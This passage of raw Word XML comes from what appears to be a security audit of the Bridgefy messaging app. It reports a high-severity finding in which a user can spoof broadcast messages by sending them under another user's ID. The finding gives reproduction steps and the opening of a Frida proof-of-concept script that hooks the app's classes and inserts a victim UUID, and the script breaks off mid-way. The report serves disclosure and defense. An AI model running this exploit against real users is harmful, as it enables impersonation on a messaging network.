                      <wps:cNvPr id="46" name="Graphic 46"/>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5.050488pt;width:144pt;height:.1pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:-15713280;mso-wrap-distance-left:0;mso-wrap-distance-right:0" id="docshape35" coordorigin="1440,301" coordsize="2880,0" path="m1440,301l4320,301e" filled="false" stroked="true" strokeweight=".75pt" strokecolor="#000000">
                <v:path arrowok="t"/>
                <v:stroke dashstyle="solid"/>
                <w10:wrap type="topAndBottom"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="105"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>56</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId93">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://www.zetetic.net/sqlcipher/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>57</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="55"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId94">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://developer.apple.com/library/...#//apple_ref/doc/uid/TP40010672-CH2-</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-4"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>SW28</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>58</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="58"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId95">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://bencoding.com/2017/02/20/swift-excluding-files-from-icloud-backup/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:header="0" w:footer="1147" w:top="1780" w:bottom="1340" w:left="1440" w:right="1080"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="182"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_TOC_250038" w:id="17"/>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>BFY-01-043</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>WP1/2:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Arbitrary</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Broadcast</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Message</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Spoofing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>via</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>IDOR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>High</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="56"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="368"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>It was found that Broadcast messages can be manipulated to impersonate arbitrary Bridgefy users on both the Android and iOS applications. Malicious attackers could abuse this weakness to send specially</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>crafted</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Broadcast</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>messages</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>that</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>spoof</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>any</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>user, as well as users that do not even exist. Please note that the attacker must know the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>UUID </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>of the spoofed user, however this may already be known when such user is already a contact, or obtained through a separate leak. This issue was confirmed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>using the following steps:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Step</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>1:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Login</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>on</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>attacker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>device</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="475"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Login</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>with</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>attacker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId96">
        <w:r>
          <w:rPr/>
          <w:t>(+12066561175@bridgefy.app)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>credentials</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>on</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>attacker </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>device.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Step</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>2:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Login</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>on</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>victim</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>device</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Login</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-12"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>with</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>victim</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId97">
        <w:r>
          <w:rPr/>
          <w:t>(+12014222730@bridgefy.app)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>credentials</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>on</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>victim</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>device.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="530" w:lineRule="atLeast" w:before="3"/>
        <w:ind w:right="3596"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Step</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>3:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Run</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Frida</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>on</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>attacker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>device Script Name:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="42"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>broadcast_attack.js</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="75"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="1"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Script</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Contents:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="36"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Java.perform(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>function</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="32"/>
        <w:ind w:left="1440" w:right="363" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:spacing w:val="-13"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>bridgefyService</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-13"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-13"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Java.use(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>'me.bridgefy.main.ui.service.BridgefyService'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>); </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>var </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>payload = Java.use(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>'me.bridgefy.messagekit.model.BroadcastPayload'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="1440" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>var </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>timestamp = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Date.now()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="32"/>
        <w:ind w:left="1440" w:right="3596" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:spacing w:val="-25"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>javaInteger=Java.use(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>'java.lang.Integer'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>); </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>var </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>numero1=javaInteger.$</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>(1);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="1440" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>var </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>VICTIM_ID=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"8cbcc888-741f-42c2-b1b9-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>fe5b2f9bf7d8"</w:t>
